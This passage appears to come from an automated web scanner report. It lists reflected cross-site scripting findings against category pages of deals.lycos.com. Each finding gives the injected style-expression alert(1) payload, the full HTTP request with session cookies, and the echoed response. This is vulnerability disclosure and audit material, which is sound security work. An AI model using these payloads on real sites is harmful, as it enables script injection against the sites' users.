Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;2e0b4"style="x:expression(alert(1))"76383e47512=1">
...[SNIP]...

1.30. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/clothing-and-accessories-202

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c906"style%3d"x%3aexpression(alert(1))"2a42ce649cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c906"style="x:expression(alert(1))"2a42ce649cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/clothing-and-accessories-202?2c906"style%3d"x%3aexpression(alert(1))"2a42ce649cd=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:33 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;2c906"style="x:expression(alert(1))"2a42ce649cd=1">
...[SNIP]...

1.31. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/computer-39

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c7a"style%3d"x%3aexpression(alert(1))"5a17236f13a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e6c7a"style="x:expression(alert(1))"5a17236f13a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/computer-39?e6c7a"style%3d"x%3aexpression(alert(1))"5a17236f13a=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:34 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e6c7a"style="x:expression(alert(1))"5a17236f13a=1">
...[SNIP]...

1.32. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/digital-cameras-168

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 688cc"style%3d"x%3aexpression(alert(1))"fbe0d430e89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 688cc"style="x:expression(alert(1))"fbe0d430e89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/digital-cameras-168?688cc"style%3d"x%3aexpression(alert(1))"fbe0d430e89=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;688cc"style="x:expression(alert(1))"fbe0d430e89=1">
...[SNIP]...

1.33. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/electronics-142

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daf23"style%3d"x%3aexpression(alert(1))"a3aefb6c21b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as daf23"style="x:expression(alert(1))"a3aefb6c21b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/electronics-142?daf23"style%3d"x%3aexpression(alert(1))"a3aefb6c21b=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;daf23"style="x:expression(alert(1))"a3aefb6c21b=1">
...[SNIP]...

1.34. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/gaming-and-toys-186

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e037e"style%3d"x%3aexpression(alert(1))"f64d12d06a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e037e"style="x:expression(alert(1))"f64d12d06a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/gaming-and-toys-186?e037e"style%3d"x%3aexpression(alert(1))"f64d12d06a2=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:00 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e037e"style="x:expression(alert(1))"f64d12d06a2=1">
...[SNIP]...

1.35. http://deals.lycos.com/deals/category/health-and-beauty-228 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/health-and-beauty-228

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b70e3"style%3d"x%3aexpression(alert(1))"c8c79da67d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b70e3"style="x:expression(alert(1))"c8c79da67d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/health-and-beauty-228?b70e3"style%3d"x%3aexpression(alert(1))"c8c79da67d5=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;b70e3"style="x:expression(alert(1))"c8c79da67d5=1">
...[SNIP]...

1.36. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/home-and-garden-196

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15b6e"style%3d"x%3aexpression(alert(1))"da228453765 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15b6e"style="x:expression(alert(1))"da228453765 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/home-and-garden-196?15b6e"style%3d"x%3aexpression(alert(1))"da228453765=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;15b6e"style="x:expression(alert(1))"da228453765=1">
...[SNIP]...

1.37. http://deals.lycos.com/deals/category/lcd-tvs-424 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/lcd-tvs-424

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c44fe"style%3d"x%3aexpression(alert(1))"9561e55b253 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c44fe"style="x:expression(alert(1))"9561e55b253 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/lcd-tvs-424?c44fe"style%3d"x%3aexpression(alert(1))"9561e55b253=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;c44fe"style="x:expression(alert(1))"9561e55b253=1">
...[SNIP]...

1.38. http://deals.lycos.com/deals/category/movies-music-books-178 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/movies-music-books-178

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0cfa"style%3d"x%3aexpression(alert(1))"f4ca06b8abd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0cfa"style="x:expression(alert(1))"f4ca06b8abd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/movies-music-books-178?b0cfa"style%3d"x%3aexpression(alert(1))"f4ca06b8abd=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;b0cfa"style="x:expression(alert(1))"f4ca06b8abd=1">
...[SNIP]...

1.39. http://deals.lycos.com/deals/category/mp3-players-144 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/mp3-players-144

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7d05"style%3d"x%3aexpression(alert(1))"683cdf99577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7d05"style="x:expression(alert(1))"683cdf99577 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/mp3-players-144?e7d05"style%3d"x%3aexpression(alert(1))"683cdf99577=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:29 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;e7d05"style="x:expression(alert(1))"683cdf99577=1">
...[SNIP]...

1.40. http://deals.lycos.com/deals/category/office-and-supplies-182 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/office-and-supplies-182

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80659"style%3d"x%3aexpression(alert(1))"5affdd2a85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80659"style="x:expression(alert(1))"5affdd2a85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/office-and-supplies-182?80659"style%3d"x%3aexpression(alert(1))"5affdd2a85=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;80659"style="x:expression(alert(1))"5affdd2a85=1">
...[SNIP]...

1.41. http://deals.lycos.com/deals/category/pc-computers-47 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pc-computers-47

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99553"style%3d"x%3aexpression(alert(1))"74c4b97e54d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 99553"style="x:expression(alert(1))"74c4b97e54d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /deals/category/pc-computers-47?99553"style%3d"x%3aexpression(alert(1))"74c4b97e54d=1 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:27 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<a href="?pn=2&amp;99553"style="x:expression(alert(1))"74c4b97e54d=1">
...[SNIP]...

1.42. http://deals.lycos.com/deals/category/sports-and-fitness-211 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/sports-and-fitness-211

Issue detail

